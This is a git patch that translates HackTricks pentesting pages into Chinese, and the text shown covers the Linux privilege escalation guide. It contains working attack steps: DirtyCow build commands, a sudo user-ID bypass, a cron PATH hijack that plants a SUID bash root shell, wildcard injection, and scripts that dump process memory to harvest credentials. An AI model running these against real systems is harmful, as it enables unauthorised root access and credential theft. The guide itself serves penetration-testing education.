From c2003a2e2fa7eaa2bf74f771924c59c4a89b7d8c Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 2 Jan 2025 18:50:28 +0000 Subject: [PATCH] Translated ['src/linux-hardening/privilege-escalation/README.md', 'src/l --- .../privilege-escalation/README.md | 1110 +++++-------- .../docker-security/README.md | 307 ++-- ...-docker-socket-for-privilege-escalation.md | 52 +- .../docker-security/apparmor.md | 222 +-- ...uthn-docker-access-authorization-plugin.md | 126 +- .../docker-security/cgroups.md | 68 +- .../README.md | 318 ++-- .../docker-release_agent-cgroups-escape.md | 44 +- ...se_agent-exploit-relative-paths-to-pids.md | 58 +- .../sensitive-mounts.md | 176 +- .../docker-security/docker-privileged.md | 92 +- .../docker-security/namespaces/README.md | 16 +- .../namespaces/cgroup-namespace.md | 66 +- .../namespaces/ipc-namespace.md | 66 +- .../namespaces/mount-namespace.md | 72 +- .../namespaces/network-namespace.md | 66 +- .../namespaces/pid-namespace.md | 70 +- .../namespaces/time-namespace.md | 52 +- .../namespaces/user-namespace.md | 94 +- .../namespaces/uts-namespace.md | 58 +- .../docker-security/seccomp.md | 156 +- .../docker-security/weaponizing-distroless.md | 24 +- .../interesting-groups-linux-pe/README.md | 140 +- .../lxd-privilege-escalation.md | 30 +- .../ld.so.conf-example.md | 110 +- .../linux-active-directory.md | 76 +- .../linux-capabilities.md | 1412 +++++++--------- .../privilege-escalation/logstash.md | 52 +- .../nfs-no_root_squash-misconfiguration-pe.md | 100 +- .../payloads-to-execute.md | 96 +- .../runc-privilege-escalation.md | 28 +- .../privilege-escalation/selinux.md | 14 +- .../socket-command-injection.md | 32 +- .../splunk-lpe-and-persistence.md | 50 +- .../ssh-forward-agent-exploitation.md | 24 +- .../wildcards-spare-tricks.md | 44 +- .../privilege-escalation/write-to-root.md | 26 +- .../useful-linux-commands/README.md | 47 +- .../bypass-bash-restrictions.md | 98 +- .../privilege-escalation/exploiting-yum.md | 20 +- .../interesting-groups-linux-pe.md | 111 +- .../macos-auto-start-locations.md | 1458 ++++++++--------- .../macos-red-teaming/README.md | 184 +-- .../macos-red-teaming/macos-keychain.md | 130 +- .../macos-red-teaming/macos-mdm/README.md | 256 +-- ...nrolling-devices-in-other-organisations.md | 56 +- .../macos-mdm/macos-serial-number.md | 50 +- .../README.md | 98 +- .../mac-os-architecture/README.md | 50 +- .../macos-function-hooking.md | 296 ++-- .../mac-os-architecture/macos-iokit.md | 216 ++- .../README.md | 958 ++++++----- .../macos-kernel-extensions.md | 116 +- .../macos-kernel-vulnerabilities.md | 4 +- .../macos-system-extensions.md | 80 +- .../macos-applefs.md | 28 +- .../macos-basic-objective-c.md | 162 +- .../macos-bypassing-firewalls.md | 64 +- .../macos-defensive-apps.md | 18 +- ...yld-hijacking-and-dyld_insert_libraries.md | 98 +- .../macos-file-extension-apps.md | 84 +- .../macos-gcd-grand-central-dispatch.md | 212 ++- .../macos-privilege-escalation.md | 156 +- .../macos-protocols.md | 102 +- .../macos-fs-tricks/README.md | 89 +- .../macos-gatekeeper.md | 61 +- .../macos-sandbox/README.md | 30 +- .../macos-sandbox-debug-and-bypass/README.md | 199 ++- .../macos-tcc/macos-tcc-bypasses/README.md | 68 +- .../macos-users.md | 34 +- src/macos-hardening/macos-useful-commands.md | 24 +- .../android-app-pentesting/README.md | 216 +-- ...bypass-biometric-authentication-android.md | 15 +- .../content-protocol.md | 15 +- .../drozer-tutorial/README.md | 22 +- .../frida-tutorial/README.md | 26 +- .../frida-tutorial/frida-tutorial-1.md | 19 +- .../frida-tutorial/frida-tutorial-2.md | 25 +- .../frida-tutorial/objection-tutorial.md | 22 +- .../frida-tutorial/owaspuncrackable-1.md | 13 +- .../install-burp-certificate.md | 28 +- .../reversing-native-libraries.md | 56 +- .../android-app-pentesting/smali-changes.md | 34 +- .../android-app-pentesting/tapjacking.md | 19 +- src/mobile-pentesting/android-checklist.md | 26 +- .../ios-pentesting-checklist.md | 46 +- .../ios-pentesting/README.md | 131 +- .../burp-configuration-for-ios.md | 22 +- .../frida-configuration-in-ios.md | 23 +- .../ios-pentesting/ios-uipasteboard.md | 43 +- .../1099-pentesting-java-rmi.md | 24 +- .../11211-memcache/memcache-commands.md | 64 +- .../113-pentesting-ident.md | 20 +- .../135-pentesting-msrpc.md | 40 +- .../15672-pentesting-rabbitmq-management.md | 14 +- .../27017-27018-mongodb.md | 40 +- .../4786-cisco-smart-install.md | 14 +- .../4840-pentesting-opc-ua.md | 21 +- .../512-pentesting-rexec.md | 16 +- .../5985-5986-pentesting-winrm.md | 63 +- .../6000-pentesting-x11.md | 34 +- .../623-udp-ipmi.md | 41 +- .../6379-pentesting-redis.md | 75 +- .../69-udp-tftp.md | 9 +- ...09-pentesting-apache-jserv-protocol-ajp.md | 44 +- .../8086-pentesting-influxdb.md | 17 +- .../9200-pentesting-elasticsearch.md | 25 +- .../pentesting-dns.md | 35 +- .../pentesting-finger.md | 18 +- .../ftp-bounce-download-2oftp-file.md | 40 +- ...entesting-jdwp-java-debug-wire-protocol.md | 29 +- .../pentesting-modbus.md | 7 - .../pentesting-mysql.md | 32 +- .../pentesting-ntp.md | 32 +- .../pentesting-postgresql.md | 85 +- .../pentesting-rdp.md | 34 +- .../pentesting-remote-gdbserver.md | 18 +- .../pentesting-rlogin.md | 9 +- .../pentesting-rpcbind.md | 22 +- .../pentesting-rsh.md | 12 +- .../pentesting-sap.md | 36 +- .../pentesting-smb/rpcclient-enumeration.md | 56 +- .../pentesting-smtp/README.md | 56 +- .../pentesting-smtp/smtp-commands.md | 32 +- .../pentesting-snmp/README.md | 40 +- .../pentesting-snmp/cisco-snmp.md | 15 +- .../pentesting-ssh.md | 28 +- .../pentesting-telnet.md | 19 +- .../pentesting-vnc.md | 19 +- .../pentesting-voip/README.md | 82 +- .../pentesting-web/403-and-401-bypasses.md | 75 +- .../pentesting-web/README.md | 91 +- .../pentesting-web/cgi.md | 22 +- .../pentesting-web/drupal/README.md | 11 +- .../pentesting-web/flask.md | 28 +- .../pentesting-web/graphql.md | 94 +- .../pentesting-web/h2-java-sql-database.md | 10 +- .../pentesting-web/jboss.md | 16 +- .../pentesting-web/jira.md | 18 +- .../pentesting-web/joomla.md | 29 +- .../pentesting-web/laravel.md | 24 +- .../pentesting-web/moodle.md | 17 +- .../pentesting-web/nginx.md | 32 +- .../pentesting-web/php-tricks-esp/README.md | 81 +- .../pentesting-web/put-method-webdav.md | 52 +- .../pentesting-web/rocket-chat.md | 9 +- .../pentesting-web/vmware-esx-vcenter....md | 10 - .../pentesting-web/web-api-pentesting.md | 60 +- .../pentesting-web/werkzeug.md | 45 +- .../pentesting-web/wordpress.md | 70 +- .../abusing-hop-by-hop-headers.md | 28 +- src/pentesting-web/cache-deception/README.md | 105 +- src/pentesting-web/clickjacking.md | 34 +- .../client-side-template-injection-csti.md | 21 +- src/pentesting-web/command-injection.md | 23 +- .../README.md | 165 +- src/pentesting-web/cors-bypass.md | 153 +- src/pentesting-web/crlf-0d-0a.md | 40 +- .../csrf-cross-site-request-forgery.md | 74 +- src/pentesting-web/dependency-confusion.md | 18 +- src/pentesting-web/deserialization/README.md | 158 +- .../exploiting-__viewstate-parameter.md | 50 +- .../deserialization/ruby-_json-pollution.md | 21 + .../domain-subdomain-takeover.md | 35 +- src/pentesting-web/email-injections.md | 60 +- src/pentesting-web/file-inclusion/README.md | 121 +- .../file-inclusion/lfi2rce-via-php-filters.md | 31 +- .../file-inclusion/lfi2rce-via-phpinfo.md | 26 +- .../file-inclusion/phar-deserialization.md | 18 +- src/pentesting-web/file-upload/README.md | 64 +- .../hacking-jwt-json-web-tokens.md | 37 +- .../http-request-smuggling/README.md | 75 +- src/pentesting-web/iframe-traps.md | 15 +- src/pentesting-web/ldap-injection.md | 25 +- src/pentesting-web/login-bypass/README.md | 26 +- .../login-bypass/sql-login-bypass.md | 18 +- src/pentesting-web/nosql-injection.md | 32 +- .../oauth-to-account-takeover.md | 41 +- src/pentesting-web/open-redirect.md | 16 +- src/pentesting-web/parameter-pollution.md | 25 +- .../proxy-waf-protections-bypass.md | 60 +- src/pentesting-web/race-condition.md | 68 +- src/pentesting-web/rate-limit-bypass.md | 20 +- src/pentesting-web/reset-password.md | 40 +- src/pentesting-web/sql-injection/README.md | 57 +- .../sql-injection/mysql-injection/README.md | 23 +- .../postgresql-injection/README.md | 32 +- .../sql-injection/sqlmap/README.md | 32 +- .../README.md | 58 +- .../README.md | 52 +- .../jinja2-ssti.md | 23 +- .../web-vulnerabilities-methodology.md | 164 +- src/pentesting-web/xpath-injection.md | 54 +- src/pentesting-web/xs-search.md | 218 +-- src/pentesting-web/xs-search/README.md | 405 +++-- .../xss-cross-site-scripting/README.md | 176 +- .../xss-cross-site-scripting/steal-info-js.md | 4 - .../xxe-xee-xml-external-entity.md | 71 +- src/todo/more-tools.md | 40 +- .../flipper-zero/fz-125khz-rfid.md | 26 +- .../abusing-ad-mssql.md | 14 +- .../ad-certificates/domain-escalation.md | 102 +- .../asreproast.md | 34 +- .../active-directory-methodology/dcsync.md | 22 +- .../kerberoast.md | 54 +- .../kerberos-double-hop-problem.md | 27 +- .../active-directory-methodology/laps.md | 12 +- .../over-pass-the-hash-pass-the-key.md | 10 +- .../pass-the-ticket.md | 28 +- .../password-spraying.md | 21 +- .../privileged-groups-and-token-privileges.md | 33 +- .../resource-based-constrained-delegation.md | 30 +- .../silver-ticket.md | 40 +- .../authentication-credentials-uac-and-efs.md | 33 +- .../README.md | 39 +- .../uac-user-account-control.md | 68 +- src/windows-hardening/av-bypass.md | 95 +- .../basic-cmd-for-pentesters.md | 21 +- .../powerview.md | 10 +- .../lateral-movement/psexec-and-winexec.md | 12 +- .../lateral-movement/smbexec.md | 23 +- .../ntlm/psexec-and-winexec.md | 18 +- .../credentials-mimikatz.md | 37 +- .../acls-dacls-sacls-aces.md | 66 +- .../dll-hijacking.md | 94 +- .../dpapi-extracting-passwords.md | 20 +- ...vilege-escalation-with-autorun-binaries.md | 48 +- .../uac-user-account-control.md | 56 +- 228 files changed, 7455 insertions(+), 10906 deletions(-) create mode 100644 src/pentesting-web/deserialization/ruby-_json-pollution.md diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index afccf5db5..b0dc5cde3 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -1,66 +1,55 @@ -# Linux Privilege Escalation +# Linux 权限提升 {{#include ../../banners/hacktricks-training.md}} -## System Information +## 系统信息 -### OS info - -Let's start gaining some knowledge of the OS running +### 操作系统信息 +让我们开始了解正在运行的操作系统 ```bash (cat /proc/version || uname -a ) 2>/dev/null lsb_release -a 2>/dev/null # old, not by default on many systems cat /etc/os-release 2>/dev/null # universal on modern systems ``` +### 路径 -### Path - -If you **have write permissions on any folder inside the `PATH`** variable you may be able to hijack some libraries or binaries: - +如果您**对`PATH`变量中的任何文件夹具有写入权限**,您可能能够劫持某些库或二进制文件: ```bash echo $PATH ``` - ### Env info -Interesting information, passwords or API keys in the environment variables? - +环境变量中有有趣的信息、密码或API密钥吗? ```bash (env || set) 2>/dev/null ``` - ### Kernel exploits -Check the kernel version and if there is some exploit that can be used to escalate privileges - +检查内核版本,看看是否有可以用来提升权限的漏洞。 ```bash cat /proc/version uname -a searchsploit "Linux Kernel" ``` +您可以在这里找到一个好的易受攻击内核列表和一些已经**编译的漏洞利用**: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) 和 [exploitdb sploits](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)。\ +其他可以找到一些**编译的漏洞利用**的网站: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) -You can find a good vulnerable kernel list and some already **compiled exploits** here: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits).\ -Other sites where you can find some **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) - -To extract all the vulnerable kernel versions from that web you can do: - +要从该网站提取所有易受攻击的内核版本,您可以执行: ```bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' ``` - -Tools that could help to search for kernel exploits are: +可以帮助搜索内核漏洞的工具有: [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\ [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\ -[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (execute IN victim,only checks exploits for kernel 2.x) +[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)(在受害者上执行,仅检查2.x内核的漏洞) -Always **search the kernel version in Google**, maybe your kernel version is written in some kernel exploit and then you will be sure that this exploit is valid. +始终**在Google中搜索内核版本**,也许你的内核版本在某个内核漏洞中被写入,这样你就可以确认这个漏洞是有效的。 ### CVE-2016-5195 (DirtyCow) -Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 - +Linux特权提升 - Linux内核 <= 3.19.0-73.8 ```bash # make dirtycow stable echo 0 > /proc/sys/vm/dirty_writeback_centisecs @@ -68,96 +57,73 @@ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` +### Sudo 版本 -### Sudo version - -Based on the vulnerable sudo versions that appear in: - +基于出现在的易受攻击的 sudo 版本: ```bash searchsploit sudo ``` - -You can check if the sudo version is vulnerable using this grep. - +您可以使用此 grep 检查 sudo 版本是否存在漏洞。 ```bash sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" ``` - #### sudo < v1.28 -From @sickrov - +来自 @sickrov ``` sudo -u#-1 /bin/bash ``` +### Dmesg 签名验证失败 -### Dmesg signature verification failed - -Check **smasher2 box of HTB** for an **example** of how this vuln could be exploited - +检查 **smasher2 box of HTB** 以获取此漏洞可能被利用的 **示例** ```bash dmesg 2>/dev/null | grep "signature" ``` - -### More system enumeration - +### 更多系统枚举 ```bash date 2>/dev/null #Date (df -h || lsblk) #System stats lscpu #CPU info lpstat -a 2>/dev/null #Printers info ``` - -## Enumerate possible defenses +## 列举可能的防御措施 ### AppArmor - ```bash if [ `which aa-status 2>/dev/null` ]; then - aa-status - elif [ `which apparmor_status 2>/dev/null` ]; then - apparmor_status - elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then - ls -d /etc/apparmor* - else - echo "Not found AppArmor" +aa-status +elif [ `which apparmor_status 2>/dev/null` ]; then +apparmor_status +elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then +ls -d /etc/apparmor* +else +echo "Not found AppArmor" fi ``` - ### Grsecurity - ```bash ((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity") ``` - ### PaX - ```bash (which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX") ``` - ### Execshield - ```bash (grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield") ``` - ### SElinux - ```bash - (sestatus 2>/dev/null || echo "Not found sestatus") +(sestatus 2>/dev/null || echo "Not found sestatus") ``` - ### ASLR - ```bash cat /proc/sys/kernel/randomize_va_space 2>/dev/null #If 0, not enabled ``` - ## Docker Breakout -If you are inside a docker container you can try to escape from it: +如果你在一个docker容器内,你可以尝试逃离它: {{#ref}} docker-security/ @@ -165,80 +131,69 @@ docker-security/ ## Drives -Check **what is mounted and unmounted**, where and why. If anything is unmounted you could try to mount it and check for private info - +检查**哪些是挂载和未挂载的**,在哪里以及为什么。如果有任何未挂载的,你可以尝试挂载它并检查私人信息。 ```bash ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null #Check if credentials in fstab grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null ``` +## 有用的软件 -## Useful software - -Enumerate useful binaries - +列举有用的二进制文件 ```bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` - -Also, check if **any compiler is installed**. This is useful if you need to use some kernel exploit as it's recommended to compile it in the machine where you are going to use it (or in one similar) - +还要检查是否**安装了任何编译器**。如果您需要使用某些内核漏洞,这很有用,因为建议在您将要使用它的机器上(或类似的机器上)进行编译。 ```bash (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") ``` +### 安装的易受攻击软件 -### Vulnerable Software Installed - -Check for the **version of the installed packages and services**. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges…\ -It is recommended to check manually the version of the more suspicious installed software. - +检查**已安装软件包和服务的版本**。可能存在某个旧版的 Nagios(例如),可以被利用来提升权限…\ +建议手动检查更可疑的已安装软件的版本。 ```bash dpkg -l #Debian rpm -qa #Centos ``` +如果您可以访问机器的SSH,您还可以使用 **openVAS** 检查机器上安装的过时和易受攻击的软件。 -If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine. +> [!NOTE] > _请注意,这些命令将显示大量信息,这些信息大多是无用的,因此建议使用一些应用程序,如OpenVAS或类似工具,检查任何已安装的软件版本是否易受已知漏洞的攻击_ -> [!NOTE] > _Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended some applications like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits_ - -## Processes - -Take a look at **what processes** are being executed and check if any process has **more privileges than it should** (maybe a tomcat being executed by root?) +## 进程 +查看 **正在执行的进程**,并检查是否有任何进程具有 **超出其应有的权限**(例如,是否有由root执行的tomcat?) ```bash ps aux ps -ef top -n 1 ``` +始终检查可能正在运行的 [**electron/cef/chromium debuggers**,您可以利用它来提升权限](electron-cef-chromium-debugger-abuse.md)。**Linpeas** 通过检查进程命令行中的 `--inspect` 参数来检测这些。\ +还要**检查您对进程二进制文件的权限**,也许您可以覆盖某个用户。 -Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\ -Also **check your privileges over the processes binaries**, maybe you can overwrite someone. +### 进程监控 -### Process monitoring +您可以使用像 [**pspy**](https://github.com/DominicBreuker/pspy) 这样的工具来监控进程。这对于识别频繁执行的易受攻击的进程或在满足一组要求时非常有用。 -You can use tools like [**pspy**](https://github.com/DominicBreuker/pspy) to monitor processes. This can be very useful to identify vulnerable processes being executed frequently or when a set of requirements are met. +### 进程内存 -### Process memory - -Some services of a server save **credentials in clear text inside the memory**.\ -Normally you will need **root privileges** to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials.\ -However, remember that **as a regular user you can read the memory of the processes you own**. +某些服务器服务在**内存中以明文保存凭据**。\ +通常,您需要**root 权限**才能读取属于其他用户的进程的内存,因此这通常在您已经是 root 并想要发现更多凭据时更有用。\ +但是,请记住,**作为普通用户,您可以读取您拥有的进程的内存**。 > [!WARNING] -> Note that nowadays most machines **don't allow ptrace by default** which means that you cannot dump other processes that belong to your unprivileged user. +> 请注意,如今大多数机器**默认不允许 ptrace**,这意味着您无法转储属于您无权限用户的其他进程。 > -> The file _**/proc/sys/kernel/yama/ptrace_scope**_ controls the accessibility of ptrace: +> 文件 _**/proc/sys/kernel/yama/ptrace_scope**_ 控制 ptrace 的可访问性: > -> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. This is the classical way of how ptracing worked. -> - **kernel.yama.ptrace_scope = 1**: only a parent process can be debugged. -> - **kernel.yama.ptrace_scope = 2**: Only admin can use ptrace, as it required CAP_SYS_PTRACE capability. -> - **kernel.yama.ptrace_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again. +> - **kernel.yama.ptrace_scope = 0**:所有进程都可以被调试,只要它们具有相同的 uid。这是 ptracing 工作的经典方式。 +> - **kernel.yama.ptrace_scope = 1**:只有父进程可以被调试。 +> - **kernel.yama.ptrace_scope = 2**:只有管理员可以使用 ptrace,因为它需要 CAP_SYS_PTRACE 能力。 +> - **kernel.yama.ptrace_scope = 3**:不允许使用 ptrace 跟踪任何进程。一旦设置,需要重启才能再次启用 ptracing。 #### GDB -If you have access to the memory of an FTP service (for example) you could get the Heap and search inside of its credentials. - +如果您可以访问 FTP 服务的内存(例如),您可以获取堆并在其凭据中进行搜索。 ```bash gdb -p (gdb) info proc mappings @@ -247,50 +202,42 @@ gdb -p (gdb) q strings /tmp/mem_ftp #User and password ``` - -#### GDB Script - +#### GDB 脚本 ```bash:dump-memory.sh #!/bin/bash #./dump-memory.sh grep rw-p /proc/$1/maps \ - | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ - | while read start stop; do \ - gdb --batch --pid $1 -ex \ - "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \ +| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ +| while read start stop; do \ +gdb --batch --pid $1 -ex \ +"dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \ done ``` - #### /proc/$pid/maps & /proc/$pid/mem -For a given process ID, **maps show how memory is mapped within that process's** virtual address space; it also shows the **permissions of each mapped region**. The **mem** pseudo file **exposes the processes memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file. - +对于给定的进程 ID,**maps 显示该进程的**虚拟地址空间内如何映射内存;它还显示**每个映射区域的权限**。**mem** 伪文件**暴露了进程的内存本身**。通过**maps** 文件,我们知道哪些**内存区域是可读的**及其偏移量。我们使用这些信息**在 mem 文件中查找并将所有可读区域转储到文件中**。 ```bash procdump() ( - cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-" - while read a b; do - dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \ - skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin" - done ) - cat $1*.bin > $1.dump - rm $1*.bin +cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-" +while read a b; do +dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \ +skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin" +done ) +cat $1*.bin > $1.dump +rm $1*.bin ) ``` - #### /dev/mem -`/dev/mem` provides access to the system's **physical** memory, not the virtual memory. The kernel's virtual address space can be accessed using /dev/kmem.\ -Typically, `/dev/mem` is only readable by **root** and **kmem** group. - +`/dev/mem` 提供对系统 **物理** 内存的访问,而不是虚拟内存。内核的虚拟地址空间可以通过 /dev/kmem 访问。\ +通常,`/dev/mem` 仅对 **root** 和 **kmem** 组可读。 ``` strings /dev/mem -n10 | grep -i PASS ``` - ### ProcDump for linux -ProcDump is a Linux reimagining of the classic ProcDump tool from the Sysinternals suite of tools for Windows. Get it in [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) - +ProcDump 是一个 Linux 版本的经典 ProcDump 工具,来自 Windows 的 Sysinternals 工具套件。获取地址在 [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) ``` procdump -p 1714 @@ -317,48 +264,42 @@ Press Ctrl-C to end monitoring without terminating the process. [20:20:58 - INFO]: Timed: [20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714 ``` +### 工具 -### Tools - -To dump a process memory you could use: +要转储进程内存,您可以使用: - [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux) -- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_You can manually remove root requirements and dump the process owned by you -- Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is required) +- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_您可以手动删除root要求并转储由您拥有的进程 +- 来自 [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) 的脚本 A.5 (需要root) -### Credentials from Process Memory +### 从进程内存中获取凭据 -#### Manual example - -If you find that the authenticator process is running: +#### 手动示例 +如果您发现身份验证进程正在运行: ```bash ps -ef | grep "authenticator" root 2027 2025 0 11:46 ? 00:00:00 authenticator ``` - -You can dump the process (see before sections to find different ways to dump the memory of a process) and search for credentials inside the memory: - +您可以转储进程(请参阅之前的部分以找到转储进程内存的不同方法)并在内存中搜索凭据: ```bash ./dump-memory.sh 2027 strings *.dump | grep -i password ``` - #### mimipenguin -The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) will **steal clear text credentials from memory** and from some **well known files**. It requires root privileges to work properly. +该工具 [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) 将 **从内存中窃取明文凭据** 和一些 **知名文件**。它需要 root 权限才能正常工作。 -| Feature | Process Name | -| ------------------------------------------------- | -------------------- | -| GDM password (Kali Desktop, Debian Desktop) | gdm-password | -| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon | -| LightDM (Ubuntu Desktop) | lightdm | -| VSFTPd (Active FTP Connections) | vsftpd | -| Apache2 (Active HTTP Basic Auth Sessions) | apache2 | -| OpenSSH (Active SSH Sessions - Sudo Usage) | sshd: | +| 特性 | 进程名称 | +| ------------------------------------------------ | --------------------- | +| GDM 密码(Kali 桌面,Debian 桌面) | gdm-password | +| Gnome 密钥环(Ubuntu 桌面,ArchLinux 桌面) | gnome-keyring-daemon | +| LightDM(Ubuntu 桌面) | lightdm | +| VSFTPd(活动 FTP 连接) | vsftpd | +| Apache2(活动 HTTP 基本认证会话) | apache2 | +| OpenSSH(活动 SSH 会话 - Sudo 使用) | sshd: | #### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc) - ```bash # un truffleproc.sh against your current Bash shell (e.g. $$) ./truffleproc.sh $$ @@ -372,186 +313,158 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1... # finding secrets # results in /tmp/tmp.o6HV0Pl3fe/results.txt ``` +## 定时/计划任务 -## Scheduled/Cron jobs - -Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?). - +检查是否有任何计划任务存在漏洞。也许你可以利用由 root 执行的脚本(通配符漏洞?可以修改 root 使用的文件?使用符号链接?在 root 使用的目录中创建特定文件?)。 ```bash crontab -l ls -al /etc/cron* /etc/at* cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#" ``` +### Cron 路径 -### Cron path +例如,在 _/etc/crontab_ 中可以找到 PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ -For example, inside _/etc/crontab_ you can find the PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ - -(_Note how the user "user" has writing privileges over /home/user_) - -If inside this crontab the root user tries to execute some command or script without setting the path. For example: _\* \* \* \* root overwrite.sh_\ -Then, you can get a root shell by using: +(_注意用户 "user" 对 /home/user 具有写入权限_) +如果在这个 crontab 中,root 用户尝试执行某个命令或脚本而不设置路径。例如: _\* \* \* \* root overwrite.sh_\ +那么,你可以通过使用以下方式获得 root shell: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh #Wait cron job to be executed /tmp/bash -p #The effective uid and gid to be set to the real uid and gid ``` +### Cron 使用带通配符的脚本(通配符注入) -### Cron using a script with a wildcard (Wildcard Injection) - -If a script is executed by root has a “**\***” inside a command, you could exploit this to make unexpected things (like privesc). Example: - +如果由 root 执行的脚本在命令中包含“**\***”,您可以利用这一点来制造意想不到的事情(例如提权)。示例: ```bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script ``` +**如果通配符前面有一个路径,比如** _**/some/path/\***_ **,那么它就不容易受到攻击(即使是** _**./\***_ **也不行)。** -**If the wildcard is preceded of a path like** _**/some/path/\***_ **, it's not vulnerable (even** _**./\***_ **is not).** - -Read the following page for more wildcard exploitation tricks: +阅读以下页面以获取更多通配符利用技巧: {{#ref}} wildcards-spare-tricks.md {{#endref}} -### Cron script overwriting and symlink - -If you **can modify a cron script** executed by root, you can get a 